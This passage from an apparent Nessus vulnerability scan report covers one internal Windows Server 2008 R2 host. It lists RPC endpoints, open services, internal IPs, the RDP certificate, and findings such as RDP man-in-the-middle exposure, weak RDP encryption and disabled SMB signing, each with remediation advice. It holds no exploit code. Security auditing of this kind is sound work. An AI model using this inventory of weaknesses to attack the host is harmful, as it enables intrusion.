Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-206d529862ba1fa65a + +Object UUID : 11417663-06f4-4011-8b7d-c2012591e9c2 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : OLED0032FEDCB4E4226AB987FA0B97B + +Object UUID : 11417663-06f4-4011-8b7d-c2012591e9c2 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-7983e165c7d13b1fed + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Local RPC service +Named pipe : LRPC-dba9332152b3af99df + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0 +Description : Unknown RPC service +Annotation : Spooler base remote object endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0 +Description : Unknown RPC service +Annotation : Base Firewall Engine API +Type : Local RPC service +Named pipe : LRPC-da454b4fc9aeadd7a9 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-da454b4fc9aeadd7a9 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-da454b4fc9aeadd7a9 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : OLE589A9569DF1F488396DB8BAD987B + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : LRPC-ee5e1b9074118f1c02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : OLE589A9569DF1F488396DB8BAD987B + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : LRPC-ee5e1b9074118f1c02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : W32TIME_ALT + +Object UUID : 666f7270-6c69-7365-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 6c637067-6569-746e-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601 +UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE3EA15B9128BF46D6AD305659F174 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +An SMB server is running on this port. + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +A CIFS server is running on this port. + + + + +Mon Jul 1 11:41:29 2013 +1 +general-purpose +Microsoft Windows Server 2008 R2 Standard Service Pack 1 +00:50:56:81:01:b8 +10.31.112.21 +172.16.138.2 +10.31.112.21 +qa3app01 +QA3APP01 +Mon Jul 1 11:33:11 2013 + + +This script displays, for each tested host, information about the scan itself : + + - The version of the plugin set + - The type of plugin feed (HomeFeed or ProfessionalFeed) + - The version of the Nessus Engine + - The port scanner(s) used + - The port range scanned + - Whether credentialed or third-party patch management checks are possible + - The date of the scan + - The duration of the scan + - The number of hosts scanned in parallel + - The number of checks done in parallel +scan_info.nasl +2013/05/31 +Nessus Scan Information +2005/08/26 +summary +None +$Revision: 1.59 $ +n/a +Information about the Nessus scan. +Information about this scan : + +Nessus version : 5.2.1 +Plugin feed version : 201306260615 +Type of plugin feed : HomeFeed (Non-commercial use only) +Scanner IP : 172.16.138.174 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no +Paranoia level : 1 +Report Verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +CGI scanning : disabled +Web application tests : disabled +Max hosts : 80 +Max checks : 5 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2013/7/1 11:33 +Scan duration : 494 sec + + + +One of several ports that were previously open are now closed or unresponsive. + +There are several possible reasons for this : + + - The scan may have caused a service to freeze or stop running. + + - An administrator may have stopped a particular service during the scanning process. + +This might be an availability problem related to the following : + + - A network outage has been experienced during the scan, and the remote network cannot be reached anymore by the scanner. + + - This scanner may has been blacklisted by the system administrator or by an automatic intrusion detection / prevention system that detected the scan. + + - The remote host is now down, either because a user turned it off during the scan or because a select denial of service was effective. + +In any case, the audit of the remote host might be incomplete and may need to be done again +check_ports.nasl +2013/05/14 +Open Port Re-check +2002/03/19 +remote +None +$Revision: 1.41 $ +- Increase checks_read_timeout and/or reduce max_checks + +- Disable any IPS during the Nessus scan +Previously open ports are now closed. +Port 135 was detected as being open but is now unresponsive +Port 3389 was detected as being open but is now unresponsive +Port 80 was detected as being open but is now unresponsive + + + +cpe:/o:microsoft:windows +cpe:/a:microsoft:remote_desktop_protocol +4.3 +CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N +The remote Terminal Services is not configured to use Network Level Authentication (NLA). NLA uses the Credential Security Support Provider (CredSSP) protocol to perform strong server authentication either through TLS/SSL or Kerberos mechanisms, which protect against man-in-the-middle attacks. In addition to improving authentication, NLA also helps protect the remote computer from malicious users and software by completing user authentication before a full RDP connection is established. +rdp_credssp_detect.nbin +2013/04/22 +Terminal Services Doesn't Use Network Level Authentication (NLA) +2012/03/23 +remote +Medium +$Revision: 1.9 $ +http://technet.microsoft.com/en-us/library/cc732713.aspx +http://www.nessus.org/u?e2628096 +Enable Network Level Authentication (NLA) on the remote RDP server. This is generally done on the 'Remote' tab of the 'System' settings on Windows. +The remote Terminal Services doesn't use Network Level Authentication. + + +Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc). +device_type.nasl +2011/05/23 +Device Type +2011/05/23 +combined +None +$Revision: 1.1 $ +n/a +It is possible to guess the remote device type. +Remote device type : general-purpose +Confidence level : 99 + + + +By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host. + +Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan. +cpe.nbin +2013/05/13 +Common Platform Enumeration (CPE) +2010/04/21 +local +None +$Revision: 1.19 $ +http://cpe.mitre.org/ +n/a +It is possible to enumerate CPE names that matched on the remote system. + +The remote operating system matched the following CPE : + + cpe:/o:microsoft:windows_server_2008:r2:sp1 -> Microsoft Windows Server 2008 R2 Service Pack 1 + +Following application CPE matched on the remote system : + + cpe:/a:microsoft:iis:7.5 -> Microsoft Internet Information Services (IIS) 7.5 + + + +cpe:/o:microsoft:windows +cpe:/a:microsoft:remote_desktop_protocol +The remote Terminal Services is configured to use SSL/TLS. +rdp_ssl.nasl +2013/02/25 +Terminal Services Use SSL/TLS +2013/02/22 +remote +None +$Revision: 1.2 $ +n/a +The remote Terminal Services use SSL/TLS. +Subject Name: + +Common Name: QA3APP01.RB.local + +Issuer Name: + +Common Name: QA3APP01.RB.local + +Serial Number: 53 CA AA C9 1B D6 05 B1 47 C0 63 C2 D9 15 B7 28 + +Version: 3 + +Signature Algorithm: SHA-1 With RSA Encryption + +Not Valid Before: Mar 08 00:16:31 2013 GMT +Not Valid After: Sep 07 00:16:31 2013 GMT + +Public Key Info: + +Algorithm: RSA Encryption +Key Length: 2048 bits +Public Key: 00 EC 63 DC 70 9D E7 C0 53 EC F2 BB 5F 84 AC F7 DE D3 5A 2C + C1 0F 54 34 D4 5B F0 BE BD 68 E7 DF BD E4 9B C0 F0 A0 05 5E + 6A 5F D6 A8 7B 5D 97 B5 65 E2 BC A9 52 C2 19 DF 5C 6A E8 E5 + FC 80 34 BE 04 19 DB 91 BC CB 8A B1 00 55 C7 22 02 44 90 A1 + 79 41 6E 98 E5 D7 50 6C B4 D8 14 C9 D6 CF B9 5A F5 D7 BE DE + EB F2 06 61 77 C5 83 1F 7C BF D8 6A 79 9D EE F9 F7 6B E6 DB + D3 64 5E 9F E6 33 72 A8 FC D7 01 FD 55 33 32 DB D2 ED 87 CF + 7F B0 9F 23 49 F2 CF 55 2E F3 98 41 84 D4 EF AC 20 25 84 D4 + AE 5E 57 A7 8B 48 9D 6F 3D D5 15 5F F1 AB 58 C5 47 EE 38 55 + 21 CF F3 EF 42 0C AD 97 3A 63 4E 3F F9 AB B8 69 4D B8 82 6E + A0 11 67 1F 5A 5A 2F B9 30 B3 7C 58 12 DE D8 40 6A C4 D8 0B + C1 DE 4F F9 3F 84 8B 02 8D F9 C1 16 FC 7B 03 2C 53 DD 9D F4 + 1E B7 D6 10 37 4D 46 74 2C 88 26 5E 6B E3 A0 D9 3F +Exponent: 01 00 01 + +Signature Length: 256 bytes / 2048 bits +Signature: 00 78 9C 8F BD 43 88 DA 1F 13 EC F5 8E A8 EA A9 D3 91 33 47 + 5F 53 2F 53 A7 5D 4E E9 18 7C CE 92 AA AC C0 C0 E8 E0 38 81 + 9E 0C CA BA AD DF ED DA 91 1A 04 0A 30 8B A4 45 78 4E EC F4 + DE 06 F5 23 C0 F9 2F F8 31 0A 84 1B 88 DC 62 7C FD 83 37 26 + 9A 4E 6A 83 69 CA F7 F7 62 F6 72 BE 51 AC 51 E7 7D 3F 50 3B + 55 B8 EC 77 08 DA E6 23 7D 92 BA AF 2A 9D 0D C8 EC 47 CB D3 + 8F D5 37 43 D8 E2 61 B0 07 CE 02 A9 26 BA 0C 9E D7 32 94 6A + 0C 3F 99 FB 95 B0 DC 39 E6 9D 0B 83 C1 02 24 08 13 FF 9A 12 + 37 E1 8F 60 EA 13 9A FB 32 76 1A 95 8A EE 24 43 38 9C 3E 74 + 5E 70 AC B9 11 F0 AF 1E F4 46 68 49 C5 F7 C0 1B 10 B1 74 20 + 19 1F 20 3B 5E 4B 57 AF E9 34 17 2D DD C0 B5 57 BF 7F 4B 9F + EB E8 B0 B1 F0 41 F2 06 91 BB 53 D5 56 F9 55 AF F4 3F F5 23 + 8B 5B 7E 0A DD D1 B7 7C 23 3D D9 1B 73 B1 1F EB FC + +Extension: Extended Key Usage (2.5.29.37) +Critical: 0 +Purpose#1: Web Server Authentication (1.3.6.1.5.5.7.3.1) + + +Extension: Key Usage (2.5.29.15) +Critical: 0 +Key Usage: Key Encipherment, Data Encipherment + + + + + +Using a combination of remote probes (TCP/IP, SMB, HTTP, NTP, SNMP, etc...), it is possible to guess the name of the remote operating system in use. It is also sometimes possible to guess the version of the operating system. +os_fingerprint.nasl +2013/04/01 +OS Identification +2003/12/09 +combined +None +$Revision: 2.34 $ +n/a +It is possible to guess the remote operating system. + +Remote operating system : Microsoft Windows Server 2008 R2 Standard Service Pack 1 +Confidence Level : 99 +Method : MSRPC + + +The remote host is running Microsoft Windows Server 2008 R2 Standard Service Pack 1 + + +This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, etc... + +This test is informational only and does not denote any security problem. +http_info.nasl +2011/05/31 +HyperText Transfer Protocol (HTTP) Information +2007/01/30 +remote +None +$Revision: 1.12 $ +n/a +Some information about the remote HTTP configuration can be extracted. + +Protocol version : HTTP/1.1 +SSL : no +Keep-Alive : no +Options allowed : OPTIONS, TRACE, GET, HEAD, POST +Headers : + + Content-Type: text/html + Last-Modified: Tue, 01 May 2012 20:47:11 GMT + Accept-Ranges: bytes + ETag: "ca7a095db27cd1:0" + Server: Microsoft-IIS/7.5 + X-Powered-By: ASP.NET + Date: Mon, 01 Jul 2013 18:37:49 GMT + Content-Length: 689 + + + + +This plugin attempts to determine the type and the version of the remote web server. +http_version.nasl +2013/06/03 +HTTP Server Type and Version +2000/01/04 +remote +None +$Revision: 1.111 $ +n/a +A web server is running on the remote host. +The remote web server type is : + +Microsoft-IIS/7.5 + + +Each ethernet MAC address starts with a 24-bit 'Organizationally Unique Identifier'. +These OUI are registered by IEEE. +ethernet_manufacturer.nasl +2011/03/27 +Ethernet Card Manufacturer Detection +2009/02/19 +combined +None +$Revision: 1.9 $ +http://standards.ieee.org/faqs/OUI.html +http://standards.ieee.org/regauth/oui/index.shtml +n/a +The manufacturer can be deduced from the Ethernet OUI. + +The following card manufacturers were identified : + +00:50:56:81:01:b8 : VMware, Inc. + + + +According to the MAC address of its network adapter, the remote host is a VMware virtual machine. + +Since it is physically accessible through the network, ensure that its configuration matches your organization's security policy. +vmware_detect.nasl +2011/03/27 +VMware Virtual Machine Detection +2005/10/27 +combined +None +$Revision: 1.24 $ +n/a +The remote host seems to be a VMware virtual machine. + + +By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory. + +As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes' in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501. + +Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities. +web_directory_options.nasl +2013/05/09 +HTTP Methods Allowed (per directory) +2009/12/10 +remote +None +$Revision: 1.7 $ +n/a +This plugin determines which HTTP methods are allowed on various CGI directories. +Based on the response to an OPTIONS request : + + - HTTP methods GET HEAD POST TRACE OPTIONS are allowed on : + + / + + + + +13818 +CVE-2005-1794 +5.1 +4.6 +CVSS2#E:F/RL:W/RC:ND +CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P +The remote version of the Remote Desktop Protocol Server (Terminal Service) is vulnerable to a man-in-the-middle (MiTM) attack. The RDP client makes no effort to validate the identity of the server when setting up encryption. An attacker with the ability to intercept traffic from the RDP server can establish encryption with the client and server without being detected. A MiTM attack of this nature would allow the attacker to obtain any sensitive information transmitted, including authentication credentials. + +This flaw exists because the RDP server stores a hardcoded RSA private key in the mstlsapi.dll library. Any local user with access to this file (on any Windows system) can retrieve the key and use it for this attack. +true +Exploits are available +tssvc_mim.nasl +17131 +2012/03/30 +Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness +2005/06/01 +remote +Medium +$Revision: 1.23 $ +http://www.oxid.it/downloads/rdp-gbu.pdf +http://www.nessus.org/u?e2628096 +http://technet.microsoft.com/en-us/library/cc782610.aspx +- Force the use of SSL as a transport layer for this service if supported, or/and +- Select the 'Allow connections only from computers running Remote Desktop with Network Level Authentication' setting if it is available. +It may be possible to get access to the remote host. +2005/05/28 +OSVDB:17131 + + +The remote web server uses its default welcome page. It probably means that this server is not used at all or is serving content that is meant to be hidden. +www_default_page.nasl +2117 +2011/08/12 +Web Server Unconfigured - Default Install Page Present +2003/03/20 +remote +None +$Revision: 1.37 $ +Disable this service if you do not use it. +The remote web server is not configured or is not properly configured. +1994/01/01 +OSVDB:2117 + +The default welcome page is from IIS. + + + +cpe:/o:microsoft:windows +This script attempts to connect to the remote host via RDP (Remote Desktop Protocol) and attempts to take a screenshot of the login screen. + +While this is not a vulnerability by itself, some versions of Windows display the names of the users who can connect and which ones are connected already. +rdp_logon_screen.nbin +2013/05/08 +RDP Screenshot +2013/04/22 +remote +None +$Revision: 1.4 $ +n/a +It is possible to take a screenshot of the remote login screen. +It was possible to gather the following screenshot of the remote login screen. +763bdee90d6b11023d6d070a1cde46d4 + + +4.3 +CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N +The remote Terminal Services service is not configured to use strong cryptography. + +Using weak cryptography with this service may allow an attacker to eavesdrop on the communications more easily and obtain screenshots and/or keystrokes. +rdp_weak_crypto.nbin +2013/04/22 +Terminal Services Encryption Level is Medium or Low +2012/01/25 +remote +Medium +$Revision: 1.6 $ +Change RDP encryption level to one of : + + 3. High + + 4. FIPS Compliant +The remote host is using weak cryptography. + +The terminal services encryption level is set to : + +2. Medium + + +2.6 +CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N +The encryption setting used by the remote Terminal Services service is not FIPS-140 compliant. +fips_rdp.nbin +2013/04/22 +Terminal Services Encryption Level is not FIPS-140 Compliant +2008/02/11 +remote +Low +$Revision: 1.9 $ +Change RDP encryption level to : + + 4. FIPS Compliant +The remote host is not FIPS-140 compliant. + +The terminal services encryption level is set to : + +2. Medium (Client Compatible) + + +Terminal Services allows a Windows user to remotely obtain a graphical login (and therefore act as a local user on the remote host). + +If an attacker gains a valid login and password, he may be able to use this service to gain further access on the remote host. An attacker may also use this service to mount a dictionary attack against the remote host to try to log in remotely. + +Note that RDP (the Remote Desktop Protocol) is vulnerable to Man-in-the-middle attacks, making it easy for attackers to steal the credentials of legitimate users by impersonating the Windows server. +windows_terminal_services.nasl +2012/03/30 +Windows Terminal Services Enabled +2002/04/20 +remote +None +$Revision: 1.29 $ +Disable Terminal Services if you do not use it, and do not allow this service to run across the Internet. +The remote Windows host has Terminal Services enabled. + + +cpe:/o:microsoft:windows +5.0 +CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N +Signing is disabled on the remote SMB server. This can allow man-in-the-middle attacks against the SMB server. +smb_signing_disabled.nasl +2012/03/05 +SMB Signing Disabled +2012/01/19 +remote +Medium +$Revision: 1.7 $ +http://support.microsoft.com/kb/887429 +http://www.nessus.org/u?74b80723 +http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html +Enforce message signing in the host's configuration. On Windows, this is found in the Local Security Policy. On Samba, the setting is called 'server signing'. See the 'see also' links for further details. +Signing is disabled on the remote SMB server. +2012/01/17 + + +It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request. +find_service.nasl +2013/05/12 +Service Detection +2007/08/19 +remote +None +$Revision: 1.123 $ +n/a +The remote service could be identified. +A web server is running on this port. + + +The name of this machine either does not resolve or resolves to a different IP address. + +This may come from a badly configured reverse DNS or from a host file in use on the Nessus scanning host. + +As a result, URLs in plugin output may not be directly usable in a web browser and some web tests may be incomplete. +bad_rdns.nasl +2011/10/06 +Inconsistent Hostname and IP Address +2010/05/03 +remote +None +1.6 +Fix the reverse DNS or host file. +The remote host's hostname is not consistent with DNS information. +The host name 'qa3app01' does not resolve to an IP address + + +Nessus was able to resolve the FQDN of the remote host. +fqdn.nasl +2012/09/28 +Host Fully Qualified Domain Name (FQDN) Resolution +2004/02/11 +remote +None +$Revision: 1.12 $ +n/a +It was possible to resolve the name of the remote host. + +10.31.112.21 resolves as qa3app01. + + + +Makes a traceroute to the remote host. +traceroute.nasl +2013/04/11 +Traceroute Information +1999/11/27 +remote +None +1.62 +n/a +It was possible to obtain traceroute information. +For your information, here is the traceroute from 172.16.138.174 to 10.31.112.21 : +172.16.138.174 +172.16.138.2 +10.31.112.21 + + + +cpe:/o:microsoft:windows +The Nessus scanner testing the remote host has been given SMB credentials to log into the remote host, however these credentials do not have administrative privileges. + +Typically, when Nessus performs a patch audit, it logs into the remote host and reads the version of the DLLs on the remote host to determine if a given patch has been applied or not. This is the method Microsoft recommends to determine if a patch has been applied. + +If your Nessus scanner does not have administrative privileges when doing a scan, then Nessus has to fall back to perform a patch audit through the registry which may lead to false positives (especially when using third-party patch auditing tools) or to false negatives (not all patches can be detected through the registry). +smb_scan_not_admin.nasl +2013/01/07 +Nessus Windows Scan Not Performed with Admin Privileges +2007/03/12 +local +None +$Revision: 1.11 $ +Reconfigure your scanner to use credentials with administrative privileges. +The Nessus scan of this host may be incomplete due to insufficient privileges provided. + +It was not possible to connect to '\\QA3APP01\ADMIN$' with the supplied credentials. + + + +It was not possible to connect to PIPE\winreg on the remote host. + 